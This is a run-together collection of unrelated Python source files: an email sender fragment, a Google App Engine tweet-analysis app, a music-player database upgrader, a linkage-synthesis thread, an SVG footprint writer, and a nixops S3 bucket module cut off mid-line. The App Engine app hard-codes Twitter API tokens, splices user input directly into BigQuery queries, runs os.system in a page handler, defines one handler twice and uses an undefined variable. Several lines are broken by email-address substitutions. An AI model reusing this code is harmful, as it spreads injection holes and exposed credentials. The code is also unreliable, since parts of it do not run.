gen_boundary_hash()\n self.body = \'\'.join([\n \'--%s%s\' % (boundary, MM_DEFAULT_CRLF ),\n \'Content-Type: %s%s%s\' % (self.headers[\'Content-Type\'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),\n self.body,\n self.create_attachments_part(boundary),\n \'%s--%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )\n ])\n self.headers[\'Content-Type\'] = \'multipart/mixed; boundary=""%s""\' % (boundary)\n \n self.headers[\'Message-ID\'] = self.gen_message_id()\n \n if hasattr(self, \'subject\'):\n self.headers[\'Subject\'] = encode_header(self.subject, self.charset)\n \n def gen_message_id(self):\n return \'<%s.%08x@%s>\' % (datetime.datetime.now().strftime(\'%Y%m%d%H%M%S\'), random.randint(0, sys.maxint), self.kw.get(\'host\', \'localhost\'))\n\n def add_recipient(self, email, name = None):\n self.recipients[email] = name if name else email\n\n def send(self):\n self.build()\n \n extra_headers = self.get_extra_headers()\n \n for email, name in self.recipients.iteritems():\n message = \'%s%sTo: %s <%s>%s%s%s\' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body)\n s = smtplib.SMTP(self.kw.get(\'smtp_relay\', \'127.0.0.1\'))\n s.sendmail(self.from_email, email, message)\n s.quit()\n \n def get_extra_headers(self):\n return MM_DEFAULT_CRLF.join([ \'%s: %s\' % (k, v) for k,v in self.headers.iteritems() ])\n\n\n', '__author__ = dummy@email.com (J. Matthew Landis)\'\n\n\nimport os\nimport logging\nimport pickle\nimport webapp2\nimport time\nimport httplib2\nimport json\nimport tweepy\nimport haigha\nfrom collections import Counter\nfrom haigha.connections.rabbit_connection import RabbitConnection\nfrom apiclient import discovery\nfrom oauth2client import appengine\nfrom oauth2client import client\nfrom google.appengine.api import memcache\nfrom google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.webapp import template\n#######################################################################\n\nPROJECTID = \'934763316754\'\n\nCLIENT_SECRETS = os.path.join(os.path.dirname(__file__), \'client_secrets.json\')\n\n# Helpful message to display in the browser if the CLIENT_SECRETS file\n# is missing.\nMISSING_CLIENT_SECRETS_MESSAGE = """"""""""\n

    Warning: Please configure OAuth 2.0

    \n

    \nTo make this sample run you will need to populate the client_secrets.json file\nfound at:\n

    \n

    \n%s.\n

    \n

    with information found on the APIs Console.\n

    \n"""""" % CLIENT_SECRETS\n\nhttp = httplib2.Http(memcache)\nservice = discovery.build(""plus"", ""v1"", http=http)\nbigquery_service = discovery.build(""bigquery"",""v2"", http=http)\n\nconsumer_key = ""9xNrmD6hE0xnRSYdZt5t0XT0B""\nconsumer_secret = ""kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG""\naccess_token = ""46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7""\naccess_token_secret = ""D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG""\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\ndecorator = appengine.oauth2decorator_from_clientsecrets(\n CLIENT_SECRETS,\n scope=\'https://www.googleapis.com/auth/plus.me\',\n message=MISSING_CLIENT_SECRETS_MESSAGE)\n\nbq_decorator = appengine.oauth2decorator_from_clientsecrets(\n CLIENT_SECRETS,\n scope=\'https://www.googleapis.com/auth/bigquery\',\n message=MISSING_CLIENT_SECRETS_MESSAGE)\n\n## Function to retrieve and render a template\ndef render_template(handler, templatename, templatevalues):\n path = os.path.join(os.path.dirname(__file__), \'templates/\' + templatename)\n html = template.render(path, templatevalues)\n handler.response.out.write(html)\n\n#######################################################################\n## Handles and loads index page\nclass MainPage(webapp2.RequestHandler):\n\n def get(self):\n\t\tnickname = ""null""\n\t\temail = ""null""\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\tnickname = ui.fname+ "" "" +ui.lname\n\t\t\t\temail = user.email()\t\n\t\t\t\tlogin = users.create_login_url(\'/\')\n\t\t\telse:\n\t\t\t\tnickname = user.nickname()\n\t\t\t\temail = user.email()\n\t\t\t\tlogin = \'/createProfile\'\n\t\telse:\n\t\t\tui = None\n\t\t\tlogin = users.create_login_url(\'/\')\n\t\tlogout = users.create_logout_url(\'/\')\n\t\tos.system(""python stream.py"")\n\t\ttemplate_values = {\n\t\t\'login\': login,\n\t\t\'logout\': logout,\n\t\t\'user\': user,\n\t\t\'nickname\': nickname,\n\t\t\'email\': email\n\t\t}\n\t\trender_template(self, \'index.html\', template_values)\n\n#######################################################################\n## Handle user info and profile\nclass CreateProfile(webapp2.RequestHandler):\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tself.redirect(\'/profile\')\n\t\t\telse:\n\t\t\t\ttemplate_data = {\'logout\':users.create_logout_url(\'/\'), \'nickname\': users.nickname()}\n\t\t\t\ttemplate_path = \'templates/createProfile.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\telse:\n\t\t\tself.redirect(user.create_login_url(\'/\'))\n\n\n#######################################################################\n## process user profile\n## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page\nclass ProcessUser(webapp2.RequestHandler) :\n\n def post(self) :\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tfname = self.request.get(\'fname\')\n\t\t\tlname = self.request.get(\'lname\')\n\t\t\tfname.replace("" "", """")\n\t\t\tlname.replace("" "", """")\n\t\t\twords = self.request.get_all(\'word\')\n\t\t\tif (not(not fname)) & (not(not lname)):\n\t\t\t\tNewUser = UserModel()\n\t\t\t\tNewUser.uid = user.user_id()\n\t\t\t\tNewUser.fname = fname\n\t\t\t\tNewUser.lname = lname\n\t\t\t\tNewUser.words = []\n\t\t\t\tfor word in words:\n\t\t\t\t\tword.replace("" "", """")\n\t\t\t\t\tif word:\n\t\t\t\t\t\tNewUser.words+=[word]\n\t\t\t\tNewUser.put()\n\t\t\t\tself.redirect(\'/profile\')\n\t\t\telse:\n\t\t\t\tself.redirect(\'/createProfile\')\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n#######################################################################\n## Model Data\nclass DataHandler(webapp2.RequestHandler) :\n\n @bq_decorator.oauth_aware\n def get(self) :\n if bq_decorator.has_credentials():\n http = bq_decorator.http()\n inputData = self.request.get(""inputData"")\n queryData = {\'query\':\'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM \'\n\'[publicdata:samples.shakespeare] WHERE word=""\'+inputData+\'"" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount\'}\n tableData = bigquery_service.jobs()\n dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)\n\n resp = []\n if \'rows\' in dataList:\n #parse dataList\n for row in dataList[\'rows\']:\n for key,dict_list in row.iteritems():\n count = dict_list[0]\n year = dict_list[1]\n corpus = dict_list[2]\n resp.append({\'count\': count[\'v\'],\'year\':year[\'v\'],\'corpus\':corpus[\'v\']})\n else:\n resp.append({\'count\':\'0\',\'year\':\'0\',\'corpus\':\'0\'})\n self.response.headers[\'Content-Type\'] = \'application/json\'\n self.response.out.write(json.dumps(resp))\n else:\n self.response.write(json.dumps({\'error\':\'No credentials\'}))\n\n\t\t\t\n#######################################################################\n## Model Words\nclass WordsHandler(webapp2.RequestHandler) :\n\n @bq_decorator.oauth_aware\n def get(self) :\n if bq_decorator.has_credentials():\n http = bq_decorator.http()\n inputData = self.request.get(""inputData"")\n queryData = {\'query\':\'SELECT text FROM \'\n\'[doctor-know:rtda.tweets] WHERE Words CONTAINS ""\'+inputData+\'""GROUP BY text ORDER BY text LIMIT 150\'}\n tableData = bigquery_service.jobs()\n dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)\n\n resp = {}\n resp[\'text\'] = status.text\n resp[\'created_at\'] = time.mktime(status.created_at.timetuple())\n resp[\'geo\'] = status.geo\n resp[\'source\'] = status.source\n self.response.headers[\'Content-Type\'] = \'application/json\'\n self.response.out.write(json.dumps(resp))\n else:\n self.response.write(json.dumps({\'error\':\'No credentials\'}))\n\n\n#######################################################################\n## Model Words\nclass WordsHandler(webapp2.RequestHandler) :\n\n inputData = ""yes""\n @bq_decorator.oauth_aware\n def get(self) :\n if bq_decorator.has_credentials():\n http = bq_decorator.http()\n inputData = self.request.get(""inputData"")\n queryData = {\'query\':\'SELECT text FROM \'\n\'[doctor-know:rtda.tweets] WHERE text CONTAINS ""\'+inputData+\'"" GROUP BY text ORDER BY text LIMIT 300\'}\n tableData = bigquery_service.jobs()\n dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)\n\n tweets = []\n if \'rows\' in dataList:\n #parse dataList\n count = 0\n for row in dataList[\'rows\']:\n for key,dict_list in row.iteritems():\n tweet = dict_list[0]\n count += 1\n tweets.append({\'text\': tweet})\n if count == 300:\n break\n\n\n ignore_words = [ ""fuck"", ""shit"", ""cock"", ""penis"", ""porn""]\n words = []\n for tweet in tweets:\n tt = tweet.get(\'text\', """")\n for word in tt.split():\n if ""http"" in word:\n continue\n if word not in ignore_words:\n words.append(word)\n\n resp = Counter(words)\n\n resp.headers.add(\'Access-Control-Allow-Origin\', ""*"")\n return resp\n\n # self.response.headers[\'Content-Type\'] = \'application/json\'\n # self.response.out.write(json.dumps(tweets))\n # else:\n # self.response.write(json.dumps({\'error\':\'No credentials\'}))\n\n\n#######################################################################\n## Profile Page\nclass ProfilePage(webapp2.RequestHandler) :\n\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\ttemplate_data = {\'firstname\': ui.fname, \'lastname\': ui.lname, \'words\': ui.words, \'nickname\': ui.fname+ "" "" +ui.lname, \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/profile.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\t\telse:\n\t\t\t\tself.redirect(\'/createProfile\')\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n#######################################################################\n## Artificial Creativity Engine\nclass DisplayEngine(webapp2.RequestHandler) :\n\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\ttemplate_data = {\'nickname\': ui.fname+ "" "" +ui.lname, \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/engine.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\t\telse:\n\t\t\t\ttemplate_data = {\'nickname\': user.nickname(), \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/engine.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n\n#######################################################################\n## Data Analysis\nclass DisplayData(webapp2.RequestHandler) :\n\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\ttemplate_data = {\'nickname\': ui.fname+ "" "" +ui.lname, \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/data.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\t\telse:\n\t\t\t\ttemplate_data = {\'nickname\': user.nickname(), \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/data.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n\n#######################################################################\n## Establish/Update User Profile\nclass UserModel(ndb.Model) :\n\tuid = ndb.StringProperty(indexed=True)\n\tfname = ndb.StringProperty(indexed = False)\n\tlname = ndb.StringProperty(indexed = False)\n\twords = ndb.StringProperty(indexed=False,repeated=True)\n\t\n#######################################################################\n## Establish/Update User Profile\n# class CustomStreamListener(tweepy.StreamListener):\n# def __init__(self, api):\n# self.api = api\n# super(tweepy.StreamListener, self).__init__()\n\n# #setup rabbitMQ Connection\n# self.connection = RabbitConnection(host=\'127.0.0.1\', heartbeat=None, debug=True)\n\n# self.channel = self.connection.channel()\n\n# #set max queue size\n# args = {""x-max-length"": 2000}\n\n# self.channel.queue.declare(queue=\'twitter_topic_feed\', arguments=args)\n\n# def on_status(self, status):\n# print status.text, ""\\n""\n\n# data = {}\n# data[\'text\'] = status.text\n# data[\'created_at\'] = time.mktime(status.created_at.timetuple())\n# data[\'geo\'] = status.geo\n# data[\'source\'] = status.source\n\n# #queue the tweet\n# self.channel.basic.publish(exchange=\'\',\n# routing_key=\'twitter_topic_feed\',\n# body=json.dumps(data))\n\n# def on_error(self, status_code):\n# print >> sys.stderr, \'Encountered error with status code:\', status_code\n# return True # Don\'t kill the stream\n\n# def on_timeout(self):\n# print >> sys.stderr, \'Timeout...\'\n# return True # Don\'t kill the stream\n\n# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))\n# # my keyword today is chelsea as the team just had a big win\n# sapi.filter(track=[self.request.get(""inputData"")])\n\n\n#######################################################################\n## Establish/Update User Profile\n# class CustomStreamListener(tweepy.StreamListener):\n# def __init__(self, api):\n# self.api = api\n# super(tweepy.StreamListener, self).__init__()\n\n# #setup rabbitMQ Connection\n# self.connection = RabbitConnection(host=\'127.0.0.1\', heartbeat=None, debug=True)\n\n# self.channel = self.connection.channel()\n\n# #set max queue size\n# args = {""x-max-length"": 2000}\n\n# self.channel.queue.declare(queue=\'twitter_topic_feed\', arguments=args)\n\n# def on_status(self, status):\n# print status.text, ""\\n""\n\n# data = {}\n# data[\'text\'] = status.text\n# data[\'created_at\'] = time.mktime(status.created_at.timetuple())\n# data[\'geo\'] = status.geo\n# data[\'source\'] = status.source\n\n# #queue the tweet\n# self.channel.basic.publish(exchange=\'\',\n# routing_key=\'twitter_topic_feed\',\n# body=json.dumps(data))\n\n# def on_error(self, status_code):\n# print >> sys.stderr, \'Encountered error with status code:\', status_code\n# return True # Don\'t kill the stream\n\n# def on_timeout(self):\n# print >> sys.stderr, \'Timeout...\'\n# return True # Don\'t kill the stream\n\n# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))\n# # my keyword today is chelsea as the team just had a big win\n# sapi.filter(track=[self.request.get(""inputData"")])\n\napp = webapp2.WSGIApplication( [\n (\'/\', MainPage),\n (\'/profile\', ProfilePage),\n (\'/createProfile\', CreateProfile),\n (\'/userRegister\', ProcessUser),\n (\'/getData\', DataHandler),\n (\'/getWords\', WordsHandler),\n (\'/data\', DisplayData),\n (\'/engine\', DisplayEngine),\n (decorator.callback_path, decorator.callback_handler()),\n (bq_decorator.callback_path, bq_decorator.callback_handler())\n], debug=True)\n', '#!/usr/bin/python\n# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nfrom lollypop.sqlcursor import SqlCursor\n\n\nclass DatabaseUpgrade:\n """"""\n Manage database schema upgrades\n """"""\n\n def __init__(self, version, db):\n """"""\n Init object\n @param version as int\n @param db as Database\n """"""\n self._version = version\n self._db = db\n # Here are schema upgrade, key is database version,\n # value is sql request\n self._UPGRADES = {\n 1: ""update tracks set duration=CAST(duration as INTEGER);"",\n 2: ""update albums set artist_id=-2001 where artist_id=-999;""\n }\n\n """"""\n Return upgrade count\n @return int\n """"""\n def count(self):\n return len(self._UPGRADES)\n\n """"""\n Upgrade database based on version\n @return new db version as int\n """"""\n def do_db_upgrade(self):\n with SqlCursor(self._db) as sql:\n for i in range(self._version+1, len(self._UPGRADES)+1):\n try:\n sql.execute(self._UPGRADES[i])\n except Exception as e:\n print(""Database upgrade failed: "", e)\n sql.commit()\n return len(self._UPGRADES)\n', '# -*- coding: utf-8 -*-\n\n""""""Thread of structural synthesis.""""""\n\n__author__ = ""Yuan Chang""\n__copyright__ = ""Copyright (C) 2016-2021""\n__license__ = ""AGPL""\n__email__ = dummy@email.com""\n\nfrom typing import Sequence, Dict, List\nfrom qtpy.QtCore import Signal\nfrom qtpy.QtWidgets import QWidget, QTreeWidgetItem\nfrom pyslvs.graph import (\n link_synthesis,\n contracted_link_synthesis,\n contracted_graph,\n conventional_graph,\n Graph,\n)\nfrom pyslvs_ui.synthesis.thread import BaseThread\n\nAssortment = Sequence[int]\n\n\ndef assortment_eval(links_expr: str) -> Assortment:\n """"""Return link assortment from expr.""""""\n return tuple(int(n.split(\'=\')[-1]) for n in links_expr.split("", ""))\n\n\nclass LinkThread(BaseThread):\n """"""Link assortment synthesis thread.""""""\n\n progress_update = Signal(int)\n result = Signal(dict)\n size_update = Signal(int)\n\n def __init__(self, nl: int, nj: int, parent: QWidget):\n super(LinkThread, self).__init__(parent)\n self.nl = nl\n self.nj = nj\n\n def run(self) -> None:\n """"""Run and return contracted link assortment.""""""\n try:\n la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop)\n except ValueError:\n self.progress_update.emit(1)\n self.result.emit({})\n self.finished.emit()\n return\n\n self.size_update.emit(len(la_list))\n assortment = {}\n for i, la in enumerate(la_list):\n if self.is_stop:\n break\n assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop)\n self.progress_update.emit(1 + i)\n self.result.emit(assortment)\n self.finished.emit()\n\n\nclass GraphThread(BaseThread):\n """"""Graphs enumeration thread.""""""\n progress_update = Signal(int)\n count_update = Signal(QTreeWidgetItem, int)\n result = Signal(list)\n\n def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget):\n super(GraphThread, self).__init__(parent)\n self.jobs = jobs\n self.degenerate = degenerate\n\n def run(self) -> None:\n """"""Run and return conventional graph.""""""\n cg_list: Dict[Sequence[int], List[Graph]] = {}\n answers = []\n for i, item in enumerate(self.jobs):\n if self.is_stop:\n break\n\n root = item.parent()\n la = assortment_eval(root.text(0))\n cla = assortment_eval(item.text(0))\n if la not in cg_list:\n cg_list[la] = contracted_graph(la, lambda: self.is_stop)\n\n answer = conventional_graph(\n cg_list[la],\n cla,\n self.degenerate,\n lambda: self.is_stop\n )\n self.count_update.emit(item, len(answer))\n answers.extend(answer)\n self.progress_update.emit(1 + i)\n\n self.result.emit(answers)\n self.finished.emit()\n', '#!/usr/bin/env python3\n\nimport xml.etree.ElementTree as ET\n\ndef get_target():\n\treturn SVG()\n\nclass SVG:\n\tdef __init__(self):\n\t\tself.svg = ET.parse(\'skeleton.svg\')\n\t\tself.mmpx = 3.543307\n\n\tdef output(self, path):\n\t\tself.svg.write(path)\n\n\n\tdef add_package(self, package):\n\t\t\'\'\'\n\t\tTarget SVG only handles one drawing at a time, only last added drawing will be part of output\n\t\t\'\'\'\n\t\tself.svg = ET.parse(\'skeleton.svg\')\n\n\t\tself.package = \\\n\t\t\t{\n\t\t\t\t\'name\': package[\'name\'],\n\t\t\t\t\'pads\': [],\n\t\t\t\t\'mnt_pads\': [],\n\t\t\t\t\'holes\': [],\n\t\t\t\t\'lines\': [],\n\t\t\t\t\'circles\': [],\n\t\t\t\t\'rectangles\': [] ,\n\t\t\t\t\'texts\': []\n\t\t\t}\n\n\n\tdef output(self, fout):\n\n\t\tpackage = self.package\n\n\t\tfor pad in package[\'pads\']:\n\t\t\tself.gen_pac_pad(pad)\n\n\t\tfor mnt_pad in package[\'mnt_pads\']: # TODO, adding mnt_pads not done\n\t\t\tself.gen_pac_mnt_pad(mnt_pad)\n\n\t\tfor hole in package[\'holes\']:\n\t\t\tself.gen_pac_hole(hole)\n\n\t\tfor line in package[\'lines\']:\n\t\t\tself.gen_pac_line(line)\n\n\t\tif(0):\n\n\t\t\tfor circle in package[\'circles\']:\n\t\t\t\tself.gen_pac_circle(circle)\n\n\t\t\tfor rect in package[\'rectangles\']:\n\t\t\t\tself.gen_pac_rectangle(rect)\n\n\t\t\tfor text in package[\'texts\']:\n\t\t\t\tself.gen_pac_text(text)\n\n\t\tself.svg.write(fout)\n\n\n\tdef add_pac_pad(self, type, angle, size, pos, number):\n\n\t\tself.package[\'pads\'].append(\n\t\t\t{\n\t\t\t\t\'type\': type,\n\t\t\t\t\'angle\': angle,\n\t\t\t\t\'size\': size,\n\t\t\t\t\'pos\': pos,\n\t\t\t\t\'number\': number\n\t\t\t})\n\n\tdef add_pac_hole(self, diameter, pos):\n\n\t\tself.package[\'holes\'].append(\n\t\t\t{\n\t\t\t\t\'d\': diameter,\n\t\t\t\t\'pos\': pos\n\t\t\t})\n\n\tdef add_pac_line(self, layer, width, vertices):\n\n\t\tself.package[\'lines\'].append(\n\t\t\t{\n\t\t\t\t\'layer\': layer,\n\t\t\t\t\'width\': width,\n\t\t\t\t\'vertices\': vertices\n\t\t\t})\n\n\tdef gen_pac_pad(self, pad): # type, angle, size, pos, number\n\n\t\ttop_layer = self.svg.find(\'.//g[@id=""Top""]\')\n\n\t\t# TODO: Types and angle\n\n\t\tel = ET.SubElement(top_layer, \'rect\')\n\t\tel.set(\'style\', \'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1\')\n\t\tel.set(\'id\', \'pin_{}\'.format(pad[\'number\']))\n\t\tel.set(\'width\', \'{}\'.format(pad[\'size\'][0]*self.mmpx))\n\t\tel.set(\'height\', \'{}\'.format(pad[\'size\'][1]*self.mmpx))\n\t\tel.set(\'x\', \'{}\'.format((pad[\'pos\'][0] - pad[\'size\'][0]/2)*self.mmpx))\n\t\tel.set(\'y\', \'{}\'.format((pad[\'pos\'][1] - pad[\'size\'][1]/2)*self.mmpx))\n\n\n\tdef gen_pac_hole(self, hole):\n\n\t\ttop_layer = self.svg.find(\'.//g[@id=""Holes""]\')\n\n\t\tcircle = ET.SubElement(top_layer, \'circle\')\n\n\t\tcircle.set(\'style\', \'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""\')\n\n\t\tcircle.set(\'cx\', \'{}\'.format(hole[\'pos\'][0]*self.mmpx))\n\t\tcircle.set(\'cy\', \'{}\'.format(hole[\'pos\'][1]*self.mmpx))\n\t\tcircle.set(\'r\', \'{}\'.format(hole[\'d\']/2*self.mmpx))\n\n\n\tdef gen_pac_line(self, line):\n\n\t\tlayer = self.svg.find(dummy@email.com(line[\'layer\']))\n\n\t\tif(line[\'layer\'] == \'Courtyard\'):\n\t\t\tcolor = \'#e63a81\'\n\t\telif(line[\'layer\'] == \'Silk\'):\n\t\t\tcolor = \'#111111\'\n\t\telse:\n\t\t\tcolor = \'#000000\'\n\n\t\tel = ET.SubElement(layer, \'path\')\n\t\tel.set(\'style\', \'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none\'.format(line[\'width\'], color=color))\n\n\t\tpathdata = \'\'\n\t\tfirst = True\n\n\t\tfor (x,y) in line[\'vertices\']:\n\t\t\tif(first):\n\t\t\t\tpathdata += \'M \' + \'{},{}\'.format(x*self.mmpx,y*self.mmpx)\n\t\t\t\tfirst = False\n\t\t\telif(x == \'end\'):\n\t\t\t\tpathdata += \' z\'\n\t\t\telse:\n\t\t\t\tpathdata += \' L \' + \'{},{}\'.format(x*self.mmpx,y*self.mmpx)\n\n\t\tel.set(\'d\', pathdata)\n\n\n\tdef gen_circle(self, layer_name, diameter, pos):\n\n\t\tlayer = self.svg.find(dummy@email.com(layer_name))\n\n\t\tif(layer_name == \'Courtyard\'):\n\t\t\tcolor = \'#e63a81\'\n\t\telif(layer_name == \'Silk\'):\n\t\t\tcolor = \'#111111\'\n\t\telse:\n\t\t\tcolor = \'#000000\'\n\n\t\tcircle = ET.SubElement(layer, \'circle\')\n\t\tcircle.set(\'style\', \'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""\'.format(color=color))\n\n\t\tcircle.set(\'cx\', \'{}\'.format(pos[0]*self.mmpx))\n\t\tcircle.set(\'cy\', \'{}\'.format(pos[1]*self.mmpx))\n\t\tcircle.set(\'r\', \'{}\'.format(diameter/2*self.mmpx))\n\n\nif(__name__ == \'__main__\'):\n\n\ttarget = get_target()\n\n\ttarget.output(\'test.svg\')\n', '# -*- coding: utf-8 -*-\n\n# Automatic provisioning of AWS S3 buckets.\n\nimport time\nimport botocore\nimport boto3\nimport nixops.util\nimport nixops.resources\nimport nixops.ec2_utils\n\n\nclass S3BucketDefinition(nixops.resources.ResourceDefinition):\n """"""Definition of an S3 bucket.""""""\n\n @classmethod\n def get_type(cls):\n return ""s3-bucket""\n\n @classmethod\n def get_resource_type(cls):\n return ""s3Buckets""\n\n def __init__(self, xml, config={}):\n nixops.resources.ResourceDefinition.__init__(self, xml, config)\n self.bucket_name = xml.find(dummy@email.com(""value"")\n self.region = xml.find(dummy@email.com(""value"")\n self.access_key_id = xml.find(dummy@email.com(""value"")\n self.policy = xml.find(dummy@email.com(""value"")\n self.website_enabled = self.config[""website""][""enabled""]\n self.website_suffix = self.config[""website""][""suffix""]\n self.website_error_document = self.config[""website""][""errorDocument""]\n\n def show_type(self):\n return ""{0} [{1}]"".format(self.get_type(), self.region)\n\n\nclass S3BucketState(nixops.resources.ResourceState):\n """"""State of an S3 bucket.""""""\n\n state = nixops.util.attr_property(""state"", nixops.resources.ResourceState.MISSING, int)\n bucket_name = nixops.util.attr_property(""ec2.bucketName"", None)\n access_key_id = nixops.util.attr_property(""ec2.accessKeyId"", None)\n region = nixops.util.attr_property(""ec2.region"", None)\n\n\n @classmethod\n def get_type(cls):\n return ""s3-bucket""\n\n\n def __init__(self, depl, name, id):\n nixops.resources.ResourceState.__init__(self, depl, name, id)\n self._conn = None\n\n\n def show_type(self):\n s = super(S3BucketState, self).show_type()\n if self.region: s = ""{0} [{1}]"".format(s, self.region)\n return s\n\n\n @property\n def resource_id(self):\n return self.bucket_name\n\n def get_definition_prefix(self):\n return ""resources.s3Buckets.""\n\n def connect(self):\n if self._conn: return\n (access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id)\n self._conn = boto3.session.Session(region_name=self.region if self.region != ""US"" else ""us-east-1"",\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key)\n\n def create(self, defn, check, allow_reboot, allow_recreate):\n\n self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id()\n if not self.access_key_id:\n raise Exception(""please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID"")\n\n if len(defn.bucket_name) > 63:\n raise Exception(""bucket name ‘{0}’ is longer than 63 characters."".format(defn.bucket_name))\n\n self.connect()\n s3client = self._conn.client(\'s3\')\n if check or self.state != self.UP:\n\n self.log(""creating S3 bucket ‘{0}’..."".format(defn.bucket_name))\n try:\n ACL = \'private\' # ..or: public-read, public-read-write, authenticated-read\n s3loc = region_to_s3_location(defn.region)\n if s3loc == ""US"":\n s3client.create_bucket(ACL = ACL,\n Bucket = defn.bucket_name)\n else:\n s3client.create_bucket(ACL = ACL,\n Bucket = defn.bucket_name,\n CreateBucketConfiguration = {\n \'LocationConstraint\': s3loc\n })\n except botocore.exceptions.ClientError as e:\n if e.response[\'Error\'][\'Code\'] != ""BucketAlreadyOwnedByYou"": raise\n\n with self.depl._db:\n self.state = self.UP\n self.bucket_name = defn.bucket_name\n self.region = defn.region\n\n if defn.policy:\n self.log(""setting S3 bucket policy on ‘{0}’..."".format(defn.bucket_name))\n s3client.put_bucket_policy(Bucket = defn.bucket_name,\n Policy = defn.policy.strip())\n else:\n try:\n s3client.delete_bucket_policy(Bucket = defn.bucket_name)\n except botocore.exceptions.ClientError as e:\n # This seems not to happen - despite docs indicating it should:\n # [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]\n if e.response[\'ResponseMetadata\'][\'HTTPStatusCode\'] != 204: raise # (204 : Bucket didn\'t have any policy to delete)\n\n if not defn.website_enabled:\n try:\n s3client.delete_bucket_website(Bucket = defn.bucket_name)\n except botocore.exceptions.ClientError as e:\n if e.response[\'ResponseMetadata\'][\'HTTPStatusCode\'] != 204: raise\n else:\n website_config = { \'IndexDocument\': { \'Suffix\': defn.website_suffix } }\n if defn.website_error_document != """":\n website_config[\'ErrorDocument\'] = { \'Key\': defn.website_error_document}\n s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config)\n\n\n\n def destroy(self, wipe=False):\n if self.state == self.UP:\n self.connect()\n try:\n self.log(""destroying S3 bucket ‘{0}’..."".format(self.bucket_name))\n bucket = self._conn.resource(\'s3\').Bucket(self.bucket_name)\n try:\n bucket.delete()\n except botocore.exceptions.ClientError as e:\n if e.response[\'Error\'][\'Code\'] != 